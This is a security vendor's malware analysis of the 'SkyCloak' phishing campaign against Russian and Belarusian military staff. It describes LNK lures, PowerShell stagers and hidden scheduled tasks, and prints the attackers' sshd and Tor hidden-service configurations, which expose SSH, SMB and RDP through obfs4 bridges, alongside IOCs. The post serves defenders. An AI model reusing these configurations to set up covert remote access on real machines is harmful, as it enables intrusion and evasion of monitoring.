• News
  • Security
  • Products
  • About Seqrite
Blogs on Information Technology, Network & Cybersecurity | Seqrite Blog
  • News
  • Security
  • Products
  • About Seqrite
Home  /  APT • Government  /  Operation SkyCloak: Tor Campaign targets Military of Russia & Belarus
31 October 2025

Operation SkyCloak: Tor Campaign targets Military of Russia & Belarus

Written by Sathwik Ram Prakki
Sathwik Ram Prakki
APT, Government

Authors: Sathwik Ram Prakki and Kartikkumar Jivani 

Contents 

  • Introduction 
  • Key Targets 
    • Industries 
    • Geographical Focus 
  • Infection and Decoys 
  • Technical Analysis 
    • PowerShell Stage 
    • Persistence 
    • Configuration 
  • Infrastructure and Attribution 
  • Conclusion 
  • SEQRITE Protection 
  • IOCs 
  • MITRE ATT&CK 

Introduction 

SEQRITE Labs has identified a campaign targeting military personnel of both Russia and Belarus, especially the Russian Airborne Forces and Belarusian Special Forces. The infection chain leads to exposing multiple local services via Tor using obfs4 bridges, allowing the attacker to anonymously communicate via an onion address. In this blog, we will explore the infection chain that uses multiple stages through PowerShell, decoys used to lure the victims, and exposing SSH as a hidden service to unblock traffic for Tor while maintaining persistence. 

Multiple campaigns with similar geographical focus have been identified this year such as HollowQuill seen in early 2025, that targeted various Russian entities such as academic & research institutes which are directly linked to government and defence sectors. In July, we have encountered another campaign dubbed CargoTalon that has targeted aerospace and defense sectors of Russia deploying Eaglet implant, where overlaps with HeadMare group were observed. Recently, targeting of Russian automobile and e-commerce industry with CAPI Backdoor has been tracked as operation MotorBeacon. 

Key Targets 

Industries 

  • Ministry of Defence 

Geographical Focus 

  • Russian Federation 
  • Republic of Belarus 

Infection and Decoys 

 

Fig. 1 – Infection Chain 

The first lure is a nomination letter from the acting commander of Military Unit 71289, which refers to the 83rd Separate Guards Airborne Assault Brigade stationed in Ussuriysk (Eastern Military District), to the Chief of Russian Airborne Forces (VDV) for appointment of military personnel. Ussuriysk is completely opposite to the ongoing Russia-Ukraine war but closer to both the China-Russia border and the Pacific Ocean. 

Fig. 2 – Decoy targeting Russia 

The second decoy letter is meant for training of military personnel from October 13th to 16th 2025 at Military Unit 89417, which refers to the 5th Separate Spetsnaz Brigade of the Belarusian Special Forces located in Maryina Horka near Minsk (Reports suggest that the unit got disbanded in 2019 but some activity was seen in 2021). 


Fig. 3 – Decoy targeting Belarus 

Technical Analysis 

The archive files have been uploaded from Belarus with modification dates as 2025-Oct-15 and 2025-Oct-21. The initial phishing ZIP contains a shortcut LNK with double extension format that translates as follows: 

Original filename  Translated name 
ТЛГ на убытие на переподготовку.pdf.lnk  TLG departure for retraining.pdf.lnk 
Исх №6626 Представление на назначение на воинскую должность.pdf.lnk  Ref. No. 6626 Nomination for appointment to military position.pdf.lnk 

Shortcut files have machine IDs ‘desktop-V7i6LHO’ and ‘desktop-u4a2HgZ’ that seem to be weaponized in the last week of September 2025. They trigger PowerShell commands which act as the initial dropper stage where another archive file beside the LNK is used to set up the entire chain. 

Fig. 4 – Shortcut file triggers PowerShell 

The command extracts the first archive file into either of the directories: 

  • %APPDATA%\dynamicUpdatingHashingScalingContext 
  • %USERPROFILE%\Downloads\incrementalStreamingMergingSocket 

and subsequently uses it to extract the second archive file from the folder ‘FOUND.000’. This multi-stage extraction drops the payloads into either ‘$env:APPDATA\logicpro’ or ‘$env:APPDATA\reaper’ directories, reads the content of a text file and executes it silently via hidden PowerShell process. 

  • \logicpro\scalingEncryptingEncoding 
  • \reaper\responsiveHashingSocketScalableDeterministic 

Before jumping into the next stage, let’s look at the contents of both the archives. It contains multiple EXEs and text files, the decoy PDF, a DLL, and a couple of XML files. Following the above chain, the next stage is execution of PowerShell script. 

Fig. 5 – Contents of archive files 

PowerShell Stage 

The script starts by checking the Windows ‘Recent’ folder and if it has more than ten shortcut files in it. This is an anti-analysis check to evade sandbox environments and make sure there’s normal user activity. Another check is done to see if the process count is greater than 50 and opens the decoy document. 

Fig. 6 – PowerShell anti-analysis 

Then it creates a mutex to ensure that only one instance is running. It reads both the XML files after replacing the username and registers scheduled tasks to start them immediately. This establishes persistence and executes the next stage of payloads defined in those XMLs. Multiple strings are concatenated to form the full onion address. 

Fig. 7 – PowerShell stager 

Then it waits until the hostname file exists which is written by Tor based on the configuration for the hidden service directory. So it waits until the local Tor instance is up and the onion is available. It creates an identification beacon in a specific format ‘<username>:<onion-address>:3-yeeifyem‘ or ends with ‘:2-lrwkymi’ and uses curl via local Tor SOCKS listener on port 9050. Multiple retry flags are used to make this persistent. 

Fig. 8 – local hostname for beacon 

Persistence 

XML files are Windows scheduled task definitions that runs daily starting at 2025-09-25T01:41:00-08:00 and has a logon trigger for the user specified. These tasks are hidden and configured to run even when the computer is idle, on demand, and without network. They ignore multiple instances and have no execution time limit. 

Fig. 9 – XML for persistence 

Fig. 10 – Scheduled Task 

 Finally moving on to the EXEs to which configuration files are passed as arguments; some are most likely SSH and SFTP server binaries based on the PDB paths and internal names. XML files trigger either the first or last two commands (both campaigns included): 

  • %AppData%/logicpro/githubdesktop.exe -f controllerGatewayEncrypting 
  • %AppData%/logicpro/pinterest.exe -f pipelineClusterDeployingCluster 
  • %AppData%/reaper/googlemaps.exe -f hashingBindingDynamicUpdatingSession 
  • %AppData%/reaper/googlesheets.exe -f decodingDistributedParsingHandlerRedundant 

Both githubdesktop.exe and googlemaps.exe from above, along with ssh-shellhost.exe, ebay.exe (SFTP server) and libcrypto.dll (LibreSSL) are legitimate “OpenSSH for Windows” binaries with compilation timestamp 2023-12-13 and PDB paths: 

  • “C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\sshd.pdb” 
  • “C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\sftp-server.pdb” 
  • “C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\ssh-shellhost.pdb” 
  • “C:\a_work\1\s\Libressl\libressl\build_X64\crypto\Release\libcrypto.pdb” 

libcrypto.dll is bundled for encryption, key exchange, and hashing; whereas ssh-shellhost.exe is used for interactive SSH sessions. This confirms that the attacker deploys a self-contained OpenSSH server inside a user’s profile directory using Tor, likely for stealth remote administration and post-exploitation persistence. 

Configuration 

The first configuration passed to SSHD [githubdesktop.exe (or) googlemaps.exe] is as follows, with the only difference between the two campaigns being that sftp subsystem is not present in the second one. Usage of non-standard port 20321 is seen, passwords are disabled and allowed only by public key along with files containing private and authorized keys. Files containing these keys are: 

  • redundantOptimizingInstanceVariableLogging 
  • redundantExecutingContainerIndexing 
  • incrementalMergingIncrementalImmutableProtocol 
  • loggingOptimizedDecoding 
Port 20321 
ListenAddress 127.0.0.1 
HostKey redundantOptimizingInstanceVariableLogging 
PubkeyAuthentication yes 
PasswordAuthentication no     

AuthorizedKeysFile AppData\Roaming\logicpro\redundantExecutingContainerIndexing 
Subsystem sftp AppData\Roaming\logicpro\ebay.exe 

The second configuration is passed to pinterest.exe (or) googlesheets.exe, which is basically tor.exe, that creates an onion service and exposes SSH, SMB, RDP and other ports over Tor. It is configured to use a pluggable transport obfs4 via an EXE named confluence.exe (or) rider.exe, which is simply an obfs4proxy binary. Usage of bridges is seen which is used to hide connections. Bridge endpoints are defined with IP, port, fingerprint, cert and iat-mode; to allow outbound Tor connections via those bridges. 

Fig. 11 – Communication with Tor bridges 

HiddenServiceDir "socketExecutingLoggingIncrementalCompiler/" 
HiddenServicePort 20322 127.0.0.1:20321 
HiddenServicePort 11435 127.0.0.1:445 
HiddenServicePort 13893 127.0.0.1:3389 
HiddenServicePort 12192 127.0.0.1:12191 
HiddenServicePort 14763 127.0.0.1:14762 
GeoIPFile geoip 
GeoIPv6File geoip6 

ClientTransportPlugin obfs4 exec confluence.exe  
UseBridges 1 
Bridge obfs4 77.20.116.133:8080 2BA6DC89D09BFFA68947EF5719BFA1DC8E410FF3 cert=wILsetGQVClg0xNK5KWeKYCZJU48I9L+XiS4UVPfi3UQzU14lXuUhnuNiaeMzs2Z3yNfZw iat-mode=2 
Bridge obfs4 156.67.24.239:33333 2F311EB4E8F0D50700E0DF918BF4E528748ED47C cert=xzae4w6xtbCRG4zpIH7AozSPI0h+lKzbshhkfkQBkmvB/DSKWncXhfPpFBNi5kRrwwVLew iat-mode=2 

In the same way legitimate obfs4proxy.exe is renamed and used in the configuration as confluence.exe and rider.exe. 

Infrastructure and Attribution 

The onion link used for registering victim via tor is: 

  • yuknkap4im65njr3tlprnpqwj4h7aal4hrn2tdieg75rpp6fx25hqbyd[.]onion 

Based on the recent netflow data from these tor bridge ports, we have seen traffic with Russia and even few neighboring nations. These IPs are categorized as either tor service or residential. 

IP:Port  ASN  Country  Category 
77.20.116[.]133:8080   3209 (Vodafone GmbH)  Germany  residential, proxy 
156.67.24[.]239:33333  51167 (Contabo GmbH)  France  tor 
146.59.116[.]226:50845  16276 (OVH SAS)  Poland  cloud 
142.189.114[.]119:443  577 (BACOM)  Canada   

Very less traffic is seen on both 156.67.24[.]239:33333 and 77.20.116[.]133:8080. Whereas Russia is seen on the remaining two IPs, which are part of the configuration and decoys targeting Russia. 

Two Russian-linked groups, APT44 (Sandworm) and APT28, have been observed to use tor to communicate with onion domain previously. But in this case, custom configurations for pluggable transport and SSHD are used in an attempt to evade network monitoring, and these attacks are targeted towards Russia and Belarus. Similar targeting has been observed to be conducted by pro-Ukraine APTs Angry Likho (Sticky Werewolf) and Awaken Likho (Core Werewolf) but SkyCloak remains unattributed for now. 

Conclusion 

A multi-chain intrusion chain has been identified, targeting both Russian and Belarusian military personnel, which leads to PowerShell stager that deploys OpenSSH and Tor bridges. This shows a stealth-oriented campaign designed to establish covert remote access and lateral movements within targeted environments. Based on current evidence, the campaign appears consistent with Eastern European-linked espionage activity targeting defense and government sectors, though attribution remains with low confidence with previously documented operations. 

SEQRITE Protection 

  • XML.Skycloak.50052.GC 
  • SCRIPT.Trojan.50053.GC 
  • SCRIPT.Skycloak.50054 

IOCs 

Archive (ZIP) 
952f86861feeaf9821685cc203d67004  ТЛГ на убытие на переподготовку.pdf 
d246dfa9e274c644c5a9862350641bac  persistentHandlerHashingEncodingScalable.zip 
8716989448bc88ba125aead800021db0  Исх №6626 Представление на назначение на воинскую должность.pdf.zip 
ae4f82f9733e0f71bb2a566a74eb055c  processorContainerLogging.zip 
Shortcut (LNK) 
32bdbf5c26e691cbbd451545bca52b56  ТЛГ на убытие на переподготовку.pdf.lnk 
2731b3e8524e523a84dc7374ae29ac23  Исх №6626 Представление на назначение на воинскую должность.pdf.lnk 
PowerShell (PS1) 
39937e199b2377d1f212510f1f2f7653  scalingEncryptingEncoding 
9242b49e9581fa7f2100bd9ad4385e8c  responsiveHashingSocketScalableDeterministic 
XML 
b61a80800a1021e9d0b1f5e8524c5708  loadingBufferFunctionHashing.xml 
b52dfb562c1093a87b78ffb6bfc78e07  incrementalRedundantRendering.xml 
45b16a0b22c56e1b99649cca1045f500  synchronizingContextBufferSchemaIncremental.xml 
dcdf4bb3b1e8ddb24ac4e7071abd1f65  frameworkRepositoryDynamicOptimized.xml 
Text 
e1a8daea05f25686c359db8fa3941e1d  controllerGatewayEncrypting 
b3382b6a44dc2cefdf242dc9f9bc9d84  pipelineClusterDeployingCluster 
229afc52dccd655ec1a69a73369446dd  hashingBindingDynamicUpdatingSession 
f6837c62aa71f044366ac53c60765739  decodingDistributedParsingHandlerRedundant 
2599d1b1d6fe13002cb75b438d9b80c4  redundantExecutingContainerIndexing 
b7ae44ac55ba8acb527b984150c376e2  redundantOptimizingInstanceVariableLogging 
0f6aaa52b05ab76020900a28afff9fff  redundantOptimizingInstanceVariableLogging.pub 
219e7d3b6ff68a36c8b03b116b405237  loggingOptimizedDecoding 
dfc78fe2c31613939b570ced5f38472c  incrementalMergingIncrementalImmutableProtocol 
77bb74dd879914eea7817d252dbab1dc  incrementalMergingIncrementalImmutableProtocol.pub 
PE (EXE/DLL) 
f6c0304671c4485c04d4a1c7c8c8ed94  githubdesktop.exe / googlemaps.exe (sshd.exe) 
cdd065c52b96614dc880273f2872619f  pinterest.exe / googlesheets.exe (tor.exe) 
37e83a8fc0e4e6ea5dab38b0b20f953b  ebay.exe (sftp-server.exe) 
6eafae19d2db29f70fa24a95cf71a19d  ssh-shellhost.exe 
664f09734b07659a6f75bca3866ae5e8  confluence.exe / rider.exe (obfs4proxy.exe) 
6eafae19d2db29f70fa24a95cf71a19d  libcrypto.dll 
Decoys 
23ad48b33d5a6a8252ed5cd38148dcb7  ТЛГ на убытие на переподготовку.pdf 
c8c41b7e02fc1d98a88f66c3451a081b  Исх №6626 Представление на назначение на воинскую должность.pdf 
Tor Bridges 
77.20.116[.]133:8080 156.67.24[.]239:33333 

146.59.116[.]226:50845 142.189.114[.]119:443 

 
yuknkap4im65njr3tlprnpqwj4h7aal4hrn2tdieg75rpp6fx25hqbyd[.]onion 

MITRE ATT&CK 

Tactic  Technique ID  Technique Name 
Resource Development  T1583  Acquire Infrastructure 
Initial Access  T1566.001  Phishing: Spearphishing Attachment 
Execution  T1204.002  User Execution: Malicious File 
T1059.001  Command and Scripting Interpreter: PowerShell 
   
T1106  Native API 
Persistence  T1053.005  Scheduled Task 
T1547  Boot or Logon Autostart Execution 
T1027  Obfuscated Files or Information 
Defense Evasion  T1036  Masquerading 
T1497  Virtualization/Sandbox Evasion 
Discovery  T1083  File and Directory Discovery 
T1046  Network Service Discovery 
T1033  System Owner/User Discovery 
Lateral Movement  T1021  Remote Services 
Collection  T1119  Automated Collection 
Command and Control  T1071  Application Layer Protocol 
T1090  Proxy 
T1571  Non-Standard Port 
Exfiltration  T1041  Exfiltration Over C2 Channel 

 

 Previous PostBuilding Trust with Data: Data Privacy Basics for Business Leader...
Sathwik Ram Prakki

About Sathwik Ram Prakki

Sathwik Ram Prakki is working as a Security Researcher in Security Labs at Quick Heal. His focus areas are Threat Intelligence, Threat Hunting, and writing about...

Articles by Sathwik Ram Prakki »

Related Posts

  • Threat Actors are Targeting US Tax-Session with new Tactics of Stealerium-infostealer

    April 30, 2025
  • Advisory: Pahalgam Attack themed decoys used by APT36 to target the Indian Government

    April 30, 2025
  • Pakistani APTs Escalate Attacks on Indian Gov. Seqrite Labs Unveils Threats and Connections

    April 24, 2024
Featured Authors
  • Seqrite
    Seqrite

    Follow us for the latest updates and insights related to security for...

    Read more..
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar is the Joint Managing Director of Quick Heal Technologies...

    Read more..
  • Mahua Chakrabarthy
    Mahua Chakrabarthy

    A tea connoisseur who firmly believes that life is too short for dull content....

    Read more..
Topics
apt (24) BYOD (11) Cyber-attack (36) cyber-attacks (58) cyberattack (16) cyberattacks (15) Cybersecurity (332) cyber security (34) Cyber threat (33) cyber threats (49) data breach (56) data breaches (29) data loss (28) data loss prevention (33) data privacy (13) data protection (28) data security (15) DLP (49) Encryption (16) endpoint security (110) Enterprise security (18) Exploit (13) GDPR (13) malware (76) malware analysis (12) malware attack (23) malware attacks (12) MDM (27) Microsoft (15) mobile device management (11) Network security (23) Patch Management (12) phishing (29) Ransomware (69) ransomware attack (30) ransomware attacks (30) ransomware protection (14) security (11) Seqrite (37) Seqrite Encryption (27) Seqrite EPS (33) Seqrite Services (16) UTM (34) Vulnerability (16) zero trust (12)
Loading
Resources
  • White Papers
  • Datasheets
  • Threat Reports
  • Manuals
  • Case Studies
About Us
  • About Seqrite
  • Leadership
  • Awards & Certifications
  • Newsroom
Archives
  • By Date
  • By Category
Loading

© 2025 Quick Heal Technologies Ltd. Cookie Policies Privacy Policies